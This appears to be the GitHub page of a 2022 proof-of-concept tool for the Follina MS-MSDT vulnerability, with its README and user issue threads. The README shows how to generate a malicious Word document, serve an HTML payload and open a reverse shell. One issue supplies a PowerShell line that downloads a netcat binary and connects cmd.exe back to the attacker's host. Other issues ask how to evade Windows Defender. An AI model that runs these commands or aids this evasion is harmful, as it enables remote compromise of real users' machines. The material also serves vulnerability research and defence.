
msdt-follina's Introduction

MS-MSDT "Follina" Attack Vector

John Hammond | May 30, 2022


Create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server.


Usage

usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

Examples

Pop calc.exe:

$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

Pop notepad.exe:

$ python3 follina.py -c "notepad"

Get a reverse shell on port 9001. Note: this downloads a netcat binary onto the victim and places it in C:\Windows\Tasks. It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.

$ python3 follina.py -r 9001


msdt-follina's People

Contributors

johnhammond

msdt-follina's Issues

Reverse connection not working properly

I am hitting this error when trying to reverse connect to my server. Could it be outdated python problem or is it something wrong with the code?

python3 follina.py  -i 10.10.10.106
[+] copied staging doc /tmp/yyfwqh86
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
----------------------------------------
Exception happened during processing of request from ('10.10.10.101', 13406)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 320, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 351, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "follina.py", line 134, in __init__
    super().__init__(*args, directory=serve_path, **kwargs)
TypeError: __init__() got an unexpected keyword argument 'directory'

This repeats several times

Reverse shell

Reverse shell command requires new port every time you run the code. I needed to change it like 5 times.

  • I tried it on my Windows 11 virtual machine and it does not work; it works on my Windows 10 main computer though.
    Great job with the code though, and I cannot wait to see how Microsoft will address this issue.

ipaddress.AddressValueError: Expected 4 octets in 'eth0'

Traceback (most recent call last):
  File "/root/Desktop/msdt-follina/follina.py", line 63, in main
    serve_host = ipaddress.IPv4Address(args.interface)
  File "/usr/lib/python3.9/ipaddress.py", line 1307, in __init__
    self._ip = self._ip_int_from_string(addr_str)
  File "/usr/lib/python3.9/ipaddress.py", line 1194, in _ip_int_from_string
    raise AddressValueError("Expected 4 octets in %r" % ip_str)
ipaddress.AddressValueError: Expected 4 octets in 'eth0'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/Desktop/msdt-follina/follina.py", line 166, in
    main(parser.parse_args())
  File "/root/Desktop/msdt-follina/follina.py", line 66, in main
    serve_host = netifaces.ifaddresses(args.interface)[netifaces.AF_INET][0][
KeyError: 2

Traceback

When I do the python3 follina.py command I get this:

Traceback (most recent call last):
  File "/home/user/msdt-follina/follina.py", line 8, in <module>
    import netifaces
ModuleNotFoundError: No module named 'netifaces'

Any help?

The passkey

It was working well for a day; after that there is no troubleshooting, the passkey keeps showing.
I reinstalled the tool and Office but still the same.
I changed the default browser but still the same.
What to do next?

Cannot pass through passkey

Hi,

I'm trying the PoC, but I am prompted to fill in a passkey. Does anybody have the same issue?


In a freshly installed VM it does not trigger the MSDT at all. Is it possible that Microsoft have patched it already?

MSDT PASS KEY

Hello,

When I try to execute the .doc file, it contacts my server to download exploit.html but nothing happens.
What's more, when I reach exploit.html directly, it opens msdt but with a passkey and nothing happens....

I use Open Office 2019 and Windows 10. Do you have an idea about this issue? I tried on Windows 11 too.

Thank you.

Intentional?

in doc/word/_rels/document.xml.rels

Target="{staged_html}!"

Follina.py line 96

external_referral = external_referral.replace(
    "{staged_html}", f"http://{serve_host}:{args.port}/index.html"
)

results, Target="http://192.168.0.1:8000/index.html!"
leaves so much to be desired xD
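A defender-side check tied to the relationship this issue points at (the external oleObject Target in word/_rels/document.xml.rels): an added Python example, not code from the repository, that scans an OOXML archive for external oleObject relationships whose Target is an http(s) URL. The sample archive it builds is constructed here for illustration, and limiting the scan to the main document part's rels file is an assumption.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Assumption: only the main document part is inspected; other parts
# (headers, footnotes) carry their own .rels files and could be added here.
RELS_PARTS = ("word/_rels/document.xml.rels",)


def external_targets(docx_bytes):
    """Return (rel_id, type_suffix, target) for every TargetMode="External"
    relationship found in the inspected .rels parts of an OOXML archive."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in RELS_PARTS:
            if part not in zf.namelist():
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((rel.get("Id"), rtype, rel.get("Target", "")))
    return found


def suspicious(targets):
    """Flag external oleObject relationships that pull content over http(s).
    Ordinary hyperlinks are also External relationships, so the type filter
    keeps a document full of web links from being reported."""
    hits = []
    for rel_id, rtype, target in targets:
        scheme = urlsplit(target).scheme.lower()
        if rtype == "oleObject" and scheme in ("http", "https"):
            hits.append((rel_id, target))
    return hits


def build_sample(target):
    """Constructed minimal archive: one internal styles relationship plus one
    external oleObject relationship, which is all this check needs to see."""
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
            f'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="{target}" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()
```

To run it against a real file, pass the bytes of a .docx (a legacy binary .doc is a different container and is not parsed here) to external_targets and then to suspicious.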

MSDT asking for passkey

After executing the document, the msdt tool is asking for a passkey, which is why the exploit is having trouble getting the desired output. Any workaround?

The Word notification: This document contains links that may refer to other files (...)

Hi

I tested the exploit in my home environment using an Xampp web server with the HTML script at a localhost location. The document is opened with the Word notification: "This document contains links that may refer to other files (...)". If I allow updating links (Word 2019), then msdt.exe is executed as a child process of Word (sdiagnhost.exe is also executed). If I do not allow updating links, then nothing happens (msdt.exe is not executed). If I correctly understand this exploit, then such a notification should appear on Word's default settings when a default Word setting is enabled (Update automatic links at open).

In all examples available on the web this notification about embedded links is absent.
Is this behavior related to the design of your POC, or maybe there can be another reason?

Thank you.

Get a reverse shell not working

According to Readme.md you should be able to get a reverse shell just by running python3 follina.py -r 9001. This didn't work for me and I had to manually download netcat on the victim machine from "https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe", then run nc.exe -e cmd.exe $HOST_IP to successfully get a reverse shell in the attacker box.

Invoke-WebRequest complains about creating an SSL connection.

This can be fixed by changing line 113 in follina.py with:
command = f"""[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""

No longer working

I think this may have been patched.
DOC opens but no payload.
Tell me if I am wrong here.

How to use not blank document

Is there a way to set the contents of the file so that it is not just blank? Is there a way to convert an existing file to a corrupted one?

OPTIONS method unsupported?

First of all: thanks for your work, been a subscriber to your YouTube for quite some time now and highly enjoy it.

This is the reason why I immediately needed to try this one when I saw the repo. Sadly, it doesn't seem to work - at least not for my setup.

I can build the doc just fine and the server starts. When I then open the doc, I do see a lot of requests, but nothing seems to happen beyond that, i.e. the command (I tried several, including calc and notepad) is not executed.

What concerns me is that I get a lot of "unsupported method (OPTIONS)" log messages (see screenshot).


I am running this from a Windows 10 machine (also tried WSL Kali, same result) and opening the doc on Windows 10 as well.

Thought I'd leave this here in case you want to further improve your tool (or tell me that I did something wrong).

Thanks again. Hoping this will be helpful.

Unexpected Keyword Argument 'directory' - line 134

I'm getting an error on my server when opening the malicious document on the target device. I'm not particularly familiar with Python, so there may be something basic I'm missing. Server: CentOS 8 Stream, Victim: Windows 10, Office Version: 18.1903.1152.0

Exception happened during processing of request from ('myIpAddr', 52247)
Traceback (most recent call last):
  File "/usr/lib64/python3.6/socketserver.py", line 320, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib64/python3.6/socketserver.py", line 351, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib64/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/home/username/Payload/msdt-follina/follina.py", line 134, in __init__
    super().__init__(*args, directory=serve_path, **kwargs)
TypeError: __init__() got an unexpected keyword argument 'directory'

{Req Help} bypass defender

I tried the exploit and I have a question now:
The exploit works when Windows Defender is off. Does that mean the vulnerability still exists in the msdt service, and Windows prevents it just using Defender? If so, what would happen if we obfuscate the html payload? Does it bypass the antivirus? How is Defender preventing this exploit? Is it signature based, or does it prevent calling msdt through the web?
This is the message I got from the Windows antivirus:


Can't use subdomains with -i option (ngrok)

Command:
python3 follina.py -i 'https://c37d-2003-f4-2720-a380-5810-4952-ef4-2125.eu.ngrok.io'
Output:
[!] error detering http hosting address. did you provide an interface or ip?
Is there a way to fix this?

pls help

The reverse connection doesn't work a lot of the time; sometimes it works, but a lot of the time it doesn't.
